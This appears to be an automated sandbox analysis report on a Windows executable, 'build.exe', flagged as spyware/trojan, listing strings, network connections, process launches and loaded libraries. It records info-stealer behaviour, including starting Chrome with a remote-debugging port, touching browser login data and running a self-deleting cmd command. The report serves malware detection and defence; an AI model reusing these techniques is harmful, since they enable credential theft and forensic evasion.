Source: build.exe, 00000000.00000002.2067111556.00000000005E1000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000000.00000002.2069404351.00000000030BB000.00000004.00000020.00020000.00000000.sdmp, opz5fu.0.dr	String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: build.exe, 00000000.00000002.2069404351.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, gdba16.0.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: chromecache_64.3.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.me
Source: chromecache_64.3.dr	String found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
Source: chromecache_61.3.dr	String found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
Source: chromecache_61.3.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
Source: chromecache_61.3.dr	String found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: build.exe, 00000000.00000002.2071757749.0000000003B68000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49755 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.166.124:443 -> 192.168.2.4:49731 version: TLS 1.2

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_0040B846 CreateDesktopA,

0_2_0040B846

System Summary

PE file has a writeable .text section

Source: build.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A051	0_2_0041A051
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00424071	0_2_00424071
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041E0E1	0_2_0041E0E1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00432081	0_2_00432081
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F0B1	0_2_0042F0B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419161	0_2_00419161
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F171	0_2_0042F171
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A111	0_2_0041A111
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041B111	0_2_0041B111
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00431111	0_2_00431111
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004241C1	0_2_004241C1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004301D1	0_2_004301D1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041E1F1	0_2_0041E1F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00421191	0_2_00421191
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A1B1	0_2_0041A1B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A251	0_2_0041A251
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430261	0_2_00430261
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419201	0_2_00419201
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F211	0_2_0042F211
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00424281	0_2_00424281
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041B2A1	0_2_0041B2A1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041E2B1	0_2_0041E2B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00424341	0_2_00424341
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F301	0_2_0042F301
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419331	0_2_00419331
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004043E1	0_2_004043E1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004243E1	0_2_004243E1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004303F1	0_2_004303F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F3F1	0_2_0042F3F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00431381	0_2_00431381
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A441	0_2_0041A441
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00432411	0_2_00432411
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004194F1	0_2_004194F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F491	0_2_0042F491
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00431501	0_2_00431501
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041B521	0_2_0041B521
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F521	0_2_0042F521
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430531	0_2_00430531
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F5C1	0_2_0042F5C1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004305D1	0_2_004305D1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041B5F1	0_2_0041B5F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004195B1	0_2_004195B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00403641	0_2_00403641
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A631	0_2_0041A631
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00431631	0_2_00431631
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004206D1	0_2_004206D1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004186F1	0_2_004186F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042E681	0_2_0042E681
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A741	0_2_0041A741
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042E741	0_2_0042E741
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423771	0_2_00423771
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042E7F1	0_2_0042E7F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004207B1	0_2_004207B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F7B1	0_2_0042F7B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F851	0_2_0042F851
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419861	0_2_00419861
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00418811	0_2_00418811
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A811	0_2_0041A811
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00403811	0_2_00403811
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430831	0_2_00430831
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423831	0_2_00423831
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004188E1	0_2_004188E1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004238F1	0_2_004238F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F8F1	0_2_0042F8F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042E891	0_2_0042E891
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004208A1	0_2_004208A1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041B8B1	0_2_0041B8B1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00420941	0_2_00420941
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042E951	0_2_0042E951
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041A901	0_2_0041A901
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00403901	0_2_00403901
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004199F1	0_2_004199F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004239F1	0_2_004239F1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042F981	0_2_0042F981
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041AA01	0_2_0041AA01
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430A11	0_2_00430A11
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423AC1	0_2_00423AC1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041AAD1	0_2_0041AAD1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419A81	0_2_00419A81
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00420AA1	0_2_00420AA1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00403AB1	0_2_00403AB1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041AB71	0_2_0041AB71
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430B31	0_2_00430B31
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00403BC1	0_2_00403BC1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423B91	0_2_00423B91
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041BBA1	0_2_0041BBA1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042DC41	0_2_0042DC41
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00418C71	0_2_00418C71
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419C01	0_2_00419C01
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430C01	0_2_00430C01
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042ECC1	0_2_0042ECC1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430CD1	0_2_00430CD1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423CE1	0_2_00423CE1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041BCB1	0_2_0041BCB1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042FCB1	0_2_0042FCB1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041BD71	0_2_0041BD71
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042DD01	0_2_0042DD01
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419D11	0_2_00419D11
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042FDD1	0_2_0042FDD1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042DDE1	0_2_0042DDE1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423DF1	0_2_00423DF1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041AD91	0_2_0041AD91
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430E21	0_2_00430E21
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041AE31	0_2_0041AE31
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00418EF1	0_2_00418EF1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00420E91	0_2_00420E91
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00436EA2	0_2_00436EA2
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042FEA1	0_2_0042FEA1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419EB1	0_2_00419EB1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041AF61	0_2_0041AF61
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430F61	0_2_00430F61
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00420F61	0_2_00420F61
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00419F71	0_2_00419F71
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00423F01	0_2_00423F01
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042DF31	0_2_0042DF31
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00430FF1	0_2_00430FF1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042DFF1	0_2_0042DFF1
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042EFA1	0_2_0042EFA1

Source: build.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.winEXE@22/24@8/8

Source: C:\Users\user\Desktop\build.exe

Code function: 0_2_004201FF CreateToolhelp32Snapshot,Process32First,

0_2_004201FF

Source: C:\Users\user\Desktop\build.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\BDIX7GG1.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03

Source: build.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\build.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1002\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: 89hl6xba1.0.dr

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: build.exe	Virustotal: Detection: 54%
Source: build.exe	ReversingLabs: Detection: 44%

Source: unknown	Process created: C:\Users\user\Desktop\build.exe "C:\Users\user\Desktop\build.exe"
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2952 --field-trial-handle=2008,i,2470610022824458282,7780640489389932804,262144 /prefetch:8
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2952 --field-trial-handle=2008,i,2470610022824458282,7780640489389932804,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10	Jump to behavior

Source: C:\Users\user\Desktop\build.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll	Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: build.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: build.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: build.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: build.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: build.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: build.exe

Static PE information: section name: .00cfg

Source: build.exe

Static PE information: section name: .text entropy: 6.80330329226556

Hooking and other Techniques for Hiding and Protection

Self deletion via cmd or bat file

Source: C:\Users\user\Desktop\build.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit
Source: C:\Users\user\Desktop\build.exe	Process created: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\Desktop\build.exe" & rd /s /q "C:\ProgramData\2dba1" & exit			Jump to behavior

Source: C:\Users\user\Desktop\build.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior
Source: C:\Users\user\Desktop\build.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior

Source: C:\Users\user\Desktop\build.exe

Process information set: NOOPENFILEERRORBOX

Jump to behavior

Source: C:\Windows\SysWOW64\timeout.exe TID: 7764

Thread sleep count: 86 > 30

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\build.exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0041008C FindFirstFileA,	0_2_0041008C
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_004291EA FindFirstFileA,	0_2_004291EA
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00428248 FindFirstFileA,memset,memset,	0_2_00428248
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0042A4E5 FindFirstFileA,	0_2_0042A4E5
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0040E749 FindFirstFileA,	0_2_0040E749
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_0040177C FindFirstFileA,	0_2_0040177C
Source: C:\Users\user\Desktop\build.exe	Code function: 0_2_00412AC9 FindFirstFileA,	0_2_00412AC9
